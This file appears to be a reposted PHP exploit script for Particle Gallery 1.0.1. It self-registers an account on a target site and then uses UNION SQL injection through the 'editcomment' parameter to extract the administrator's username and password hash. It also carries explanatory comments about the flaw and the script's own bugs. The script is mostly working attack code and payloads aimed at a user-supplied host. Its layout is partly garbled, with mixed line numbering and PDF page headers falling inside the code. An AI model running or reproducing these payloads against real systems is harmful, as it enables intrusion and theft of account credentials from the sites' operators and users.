   1    #!/usr/bin/php −q −d short_open_tag=on
   2    <?php
   3
   4    /*
   5
   6    Explanation:
   7
   8    Function dbSecure(functions.php):
   9
   10   function dbSecure($code){
   11
   12          if (get_magic_quotes_gpc()) {
   13             $code = stripslashes($code);
   14          }
   15
   16          if (function_exists("mysql_real_escape_string")){
   17                   $code = mysql_real_escape_string($code);
   18          } elseif (function_exists("mysql_escape_string")){
   19                   $code = mysql_escape_string($code);
   20          } else {
   21                   $code = addslashes($code);
   22          }
   23
   24          return $code;
   25   }
   26
   27
   28   The escaping helper is fine for values that end up inside quotes, but it is beside the point here:
   29   viewimage.php concatenates editcomment into "commentid = ..." as a bare number with no surrounding
        quotes, so an attacker never has to supply a quote character and mysql_real_escape_string() has
        nothing to escape. Escaping is not validation: a numeric parameter has to be cast
        ((int)$_GET["editcomment"]) or bound through a prepared statement.
   30
   31
   32   Vulnerable Code(viewimage.php):
   33
   34   $t−>set_var("COMMENT_ID", "");
   35   if ($_GET["editcomment"] <> ""){
   36           $sql = "SELECT * FROM " . $dbprefix . "comments WHERE commentid = " . dbSecure($_GET["editcomment"]);
   37           $cme = $db−>execute($sql);
   38           if ($usr−>Access > 1 || ($_SESSION["userid"] == $cme−>fields["userid"])){
   39                   // allow user to edit the comment
   40                   $t−>set_var("COMMENTS_TYPE", "Edit");
   41                   $t−>set_var("COMMENT_ID", $cme−>fields["commentid"]);
   42                   $t−>set_var("COMMENTS_FORM", $core . "&amp;commentspage=" . $page);
   43                   if ($_POST["comments"] <> ""){
   44                            $t−>set_var("COMMENTS_TEXT", un($_POST["comments"]));
   45                   } else {
   46                            $t−>set_var("COMMENTS_TEXT", $cme−>fields["comments"]);
   47                   }
   48           }
   49
   50
   51   ...classic: because $cme->fields is populated from whatever row the query returns, a UNION lets the
        attacker choose both the userid that the ownership check compares against $_SESSION["userid"] and
        the "comments" text that the edit form echoes back - which is exactly what the payloads below rely on.
   52

   53   */
   54
   55   error_reporting(0);
   56   ini_set("max_execution_time",0);
   57   ini_set("default_socket_timeout",5);
   58
   59   if ($argc<3) {
   60   print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   61   print "        Particle Gallery <= 1.0.1 SQL Injection Exploit\r\n";
   62   print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   63   print "Usage: w4ck1ng_pg.php [HOST] [PATH]\r\n\r\n";
   64   print "[HOST]        = Target server’s hostname or ip address\r\n";
   65   print "[PATH]        = Path where Particle Gallery is located\r\n";
   66   print "e.g. w4ck1ng_pg.php 0 victim.com /pg/\r\n";
   67   print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   68   print "                                     http://www.w4ck1ng.com\r\n";
   69   print "                                          ...Silentz\r\n";
   70   print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   71   die;
   72   }
   73
   74   function footer(){
   75
   76   print   "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   77   print   "                           http://www.w4ck1ng.com\r\n";
   78   print   "                                ...Silentz\r\n";
   79   print   "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   80
   81   }
   82
//Props to rgod for the following functions

// Shape check for the -P option: "a.b.c.d:port". The pattern has no explicit
// delimiter; PHP treats the outer "(" ... ")" as a bracket-style delimiter
// pair, so this is a valid (if unusual) PCRE pattern. Each octet is only
// checked for 1-3 digits, not for being <= 255, and \b is not an anchor, so
// the match may sit inside a longer string.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
   86   function sendpacketii($packet)
   87   {
   88     global $proxy, $host, $port, $html, $proxy_regex;
   89     if ($proxy==’’) {
   90       $ock=fsockopen(gethostbyname($host),$port);
   91       if (!$ock) {
   92          echo ’No response from ’.$host.’:’.$port; die;
   93       }
   94     }
   95     else {
   96            $c = preg_match($proxy_regex,$proxy);
   97       if (!$c) {
   98          echo ’Not a valid proxy...’;die;
   99       }
  100       $parts=explode(’:’,$proxy);
  101       echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  102       $ock=fsockopen($parts[0],$parts[1]);
  103       if (!$ock) {
  104          echo ’No response from proxy...’;die;
Silentz                                                                                            06/01/2007
                                Particle Gallery 1.0.1 Remote SQL Injection Exploit                     Page 3/7
  105             }
  106       }
  107       fputs($ock,$packet);
  108       if ($proxy==’’) {
  109         $html=’’;
  110         while (!feof($ock)) {
  111           $html.=fgets($ock);
  112         }
  113       }
  114       else {
  115         $html=’’;
  116         while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  117           $html.=fread($ock,1);
  118         }
  119       }
  120       fclose($ock);
  121   }
  122
  123   function make_seed()
  124   {
  125      list($usec, $sec) = explode(’ ’, microtime());
  126      return (float) $sec + ((float) $usec * 100000);
  127   }
  128
  129   $host = $argv[1];
  130   $path = $argv[2];
  131   $port=80;
  132   $proxy="";
  133
  134   for ($i=4; $i<=$argc−1; $i++){
  135   $temp=$argv[$i][0].$argv[$i][1];
  136   if (($temp<>"−p") and ($temp<>"−P"))
  137   {
  138   $cmd.=" ".$argv[$i];
  139   }
  140   if ($temp=="−p")
  141   {
  142      $port=str_replace("−p","",$argv[$i]);
  143   }
  144   if ($temp=="−P")
  145   {
  146      $proxy=str_replace("−P","",$argv[$i]);
  147   }
  148   }
  149
  150   if (($path[0]<>’/’) or ($path[strlen($path)−1]<>’/’)) {echo ’Error... check the path!’; die;}
  151   if ($proxy==’’) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
  152
  153
print "-------------------------------------------------------------------------\r\n";
print "      Particle Gallery <= 1.0.1 SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";

// Step 1: does the throw-away account already exist on the target?
// Name and password are hard-coded, so every run leaves the same recognisable
// artifact ("w4ck1ng") in the target's user table and web logs.
echo "\r\n[+] Checking if user exists...";

$data="username=w4ck1ng";
$data.="&password=w4ck1ng";
$data.="&from=";
$packet ="POST " . $p . "auth.php?do=signin HTTP/1.1\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;

sendpacketii($packet);

// Success is decided purely by a substring of the response body.
if (strstr($html,"User Control Panel")){echo "...Yep!\r\n";}
else{echo "...Nope!";

// Step 2 (only when the sign-in failed): self-register the account.
echo "\r\n[+] Registering...";

$data="rusername=w4ck1ng";
$data.="&password=w4ck1ng";
$data.="&password2=w4ck1ng";
$data.="&email=w4ck1ng%40www.com";
$data.="&do=register";
$packet ="POST " . $p . "auth.php?page=register HTTP/1.1\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;

sendpacketii($packet);

// First "Set-Cookie:" header, up to the first space, i.e. "name=value;" (the
// trailing ";" is kept and sent back verbatim). This value is overwritten by
// the sign-in step that follows, so it is effectively dead here. With
// error_reporting(0) a missing header just yields an empty $cookie.
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);
$cookie=$temp2[0];

// Control flow: the "Successful" test has no else branch; the "disabled" test
// exits; the trailing "else{}" and "}" close the disabled-check and the
// "...Nope!" branch respectively.
if (strstr($html,"Location: index.php?act=newbie")){echo "...Successful!\r\n";}
if (strstr($html,"Registrations are not currently being accepted.")){echo "...Registration Disabled!\r\n"; footer(); exit;}
else{} }
  198
// Step 3: sign in as the throw-away account and keep its session cookie.
echo "[+] Signing In...";

$data="username=w4ck1ng";
$data.="&password=w4ck1ng";
$data.="&from=";
$packet ="POST " . $p . "auth.php?do=signin HTTP/1.1\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;

sendpacketii($packet);

// First Set-Cookie header, up to the first space ("name=value;"). This is the
// cookie every later request carries.
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);
$cookie=$temp2[0];

// Left as-is: die() terminates the script, so the footer() and exit after it
// are unreachable and the closing banner is never printed on this path.
if (strstr($html,"Welcome to your account control panel")){echo "...Successful!";}
else{die("...Failed!\r\n"); footer(); exit;}

// Step 4: fetch the gallery front page and scrape the first image id out of a
// hard-coded HTML template fragment. The id is taken verbatim (never checked
// to be numeric) and is interpolated into every URL below.
$packet ="GET " . $p . " HTTP/1.1\r\n";
$packet.="Host: " . $host . "\r\n";
$packet.="Cookie: " . $cookie . "\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);

if (strstr($html,"<td style=\"text-align: right;\"><a href=\"viewimage.php?imageid=")){
    $temp=explode("<td style=\"text-align: right;\"><a href=\"viewimage.php?imageid=",$html);
    $temp2=explode("\">",$temp[1]);
    $imageid=$temp2[0];

    echo "\r\n[+] Image ID Retrieved..." . $imageid . "!\n";}

else{echo "\r\n[-] Cannot retrieve a valid image ID...\n"; footer(); exit;}
  235
  236
// Step 5: post a comment on the image as the throw-away user. The script does
// not say why this is required; presumably the edit-comment path used below
// only renders its form for a viewer who already has a comment on the image -
// TODO confirm against viewimage.php. The comment text stays on the target.
$data="comments=Your+about+to+get+owned%21";
$data.="&do=comment";
$data.="&commentid=";
$packet ="POST " . $p . "viewimage.php?imageid=" . $imageid . " HTTP/1.1\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: " . $cookie . "\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;

sendpacketii($packet);

// Again a body-substring check decides success.
if (strstr($html,"Comments posted successfully!")){echo "[+] Posting comment...Done!\n";}
else{echo "[-] Posting comment...Failed!\n"; footer(); exit;}
  252
// Step 6: the injection itself, through GET viewimage.php?...&editcomment=<payload>.
// As the header comment shows, editcomment is concatenated into "commentid = ..."
// unquoted, so no quote character is needed and the escaping helper is moot.
//
// Payload anatomy (the eight entries differ only in the third column):
//   999                    a comment id assumed not to exist, so the UNION row is
//                          the only row the page sees
//   /**/                   inline comments stand in for spaces
//   0,0,<uid>,0,0,<text>   six values, which must match the column count of
//                          "SELECT * FROM <prefix>comments"
//   CHAR(49,54)..CHAR(50,51)   the strings "16" .. "23"; presumably the userid
//                          column of the comments row, tried across eight values
//                          so that $_SESSION["userid"] == $cme->fields["userid"]
//                          passes for the freshly registered account - the page
//                          never confirms the column order, so verify against the schema
//   CONCAT(CHAR(...))      "Username=" . username . ":Hash=" . password, in the
//                          column the page echoes into the comments textarea
//   pg_users / userid=14   hard-coded table prefix and a hard-coded guess at the
//                          administrator's userid; neither is derived from the target
//   /*                     comments out the remainder of the original query
$sqlArray = array(
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,54),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,55),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,56),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,57),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,48),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,49),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,50),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,51),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*"
);

// Sends every payload. The loop bound is off by one ($i <= count), so the last
// iteration requests $p with an empty entry appended; a hit does not break out
// of the loop, so the remaining payloads are still sent; and the "404" test
// matches that substring anywhere in the response, not only in the status line.
for ($i=0; $i<=count($sqlArray); $i++){

    $packet ="GET " . $p . $sqlArray[$i] . " HTTP/1.1\r\n";
    $packet.="Host: " . $host . "\r\n";
    $packet.="Cookie: " . $cookie . "\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);

    // The injected CONCAT lands in the comments textarea of the edit form;
    // everything between "Username=" and the first ":" is the username.
    if (strstr($html,"name=\"comments\">Username=")){
        $temp3=explode("id=\"comments\" name=\"comments\">Username=",$html);
        $temp4=explode(":",$temp3[1]);
        $ret_user=$temp4[0];

        echo "\r\n[+] Admin User: " . $ret_user;}

    elseif (strstr($html,"404")){
        echo "\r\n[-] Image ID is not valid, please try another!"; footer(); exit;}
    else{}
}
  284
// The same eight payloads again - the array is duplicated verbatim rather than
// reused; see the first copy for the payload anatomy. This pass extracts the
// hash part of the echoed "Username=...:Hash=..." string.
$sqlArray = array(
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,54),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,55),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,56),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,57),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,48),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,49),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,50),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,51),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*"
);

// Same off-by-one bound and no early break as in the first loop. The output
// label says "Admin User" but the value printed here is the password hash.
for ($i=0; $i<=count($sqlArray); $i++){

    $packet ="GET " . $p . $sqlArray[$i] . " HTTP/1.1\r\n";
    $packet.="Host: " . $host . "\r\n";
    $packet.="Cookie: " . $cookie . "\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);

    // Everything between "Hash=" and the closing </textarea> is the hash.
    if (strstr($html,":Hash=")){
        $temp3=explode("Hash=",$html);
        $temp4=explode("</textarea>",$temp3[1]);
        $ret_hash=$temp4[0];

        echo "\r\n[+] Admin User: " . $ret_hash . "\n";}
    else{}
}

footer();
  314
  315   ?>
  316
  317   # milw0rm.com [2007−06−01]



